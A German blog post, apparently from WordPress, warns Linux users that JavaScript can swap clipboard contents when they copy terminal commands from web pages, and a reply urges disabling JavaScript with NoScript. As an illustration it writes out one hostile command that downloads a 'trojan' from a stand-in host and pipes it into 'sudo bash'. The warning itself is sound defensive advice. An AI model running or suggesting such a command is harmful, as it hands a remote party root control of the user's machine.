Javascript des tages

Na, linuxer! Schon einmal kohd für die kommandozeile aus dem brauser ins terminal kopiert? Praktische schnippsel gibts ja in jedem forum. Ist aber keine gute idee, wenn man dabei javascript im brauser gestattet, denn javascript kann den inhalt der zwischenablage verändern. Ist schon kacke, wenn man sudo apt-get install blah ins terminalfenster kopiert hat und schließlich curl http://fuck.up/trojan | sudo bash ausführt und hinterher einen rechner anderer leute auf dem schreibtisch stehen hat.😀

Und nein, das ist keine teoretische gefahr. Selbst auf einer vertrauenswürdigen webseit könnte ein entsprechender kohd über ein werbebanner oder eine XSS-lücke im forensystem oder CMS untergejubelt werden.

Denn was in der Zwischenablage landet, lässt sich nicht ohne Weiteres kontrollieren. So wäre es durchaus denkbar, dass der Nutzer mit einer interessanten Funktion für die Kommandozeile mögliche Opfer anlockt und ihnen hier etwa Code unterschiebt, der die Sicherheit des Systems beeinträchtigt oder Schäden hervorruft. Daher sollte man Inhalte, die aus einer Webseite kopiert wurden, nicht direkt in die Eingabeaufforderung einfügen – sondern zur Sicherheit besser erst einmal in einen Texteditor, wo sich ohne Risiko überprüfen lässt, was in der Zwischenablage landete

Ich muss widersprechen! Darum sollte man immer, immer, immer javascript abschalten, wenn es nicht unbedingt technisch erforderlich ist. Javascript ist die mutter aller modernen sicherheitsprobleme im webbrauser (und außerdem der inbegriff aller dinge, die im gegenwärtigen web völlig falsch laufen und gestoppt werden müssen). Die verwendung von noscript ist ein absolutes muss, wichtiger und wirksamer als jedes antivirus-schlangenöl; und das privileg der javascript-ausführung sollte so restriktiv vergeben werden, wie es gerade noch möglich ist. Dass man die webbildzeitung so nicht mehr lesen kann, wird kein fühlendes wesen als einschränkung empfinden…

Schreibe einen Kommentar

Trage deine Daten unten ein oder klicke ein Icon um dich einzuloggen:

WordPress.com-Logo

Du kommentierst mit Deinem WordPress.com-Konto. Abmelden / Ändern )

Twitter-Bild

Du kommentierst mit Deinem Twitter-Konto. Abmelden / Ändern )

Facebook-Foto

Du kommentierst mit Deinem Facebook-Konto. Abmelden / Ändern )

Google+ Foto

Du kommentierst mit Deinem Google+-Konto. Abmelden / Ändern )

Verbinde mit %s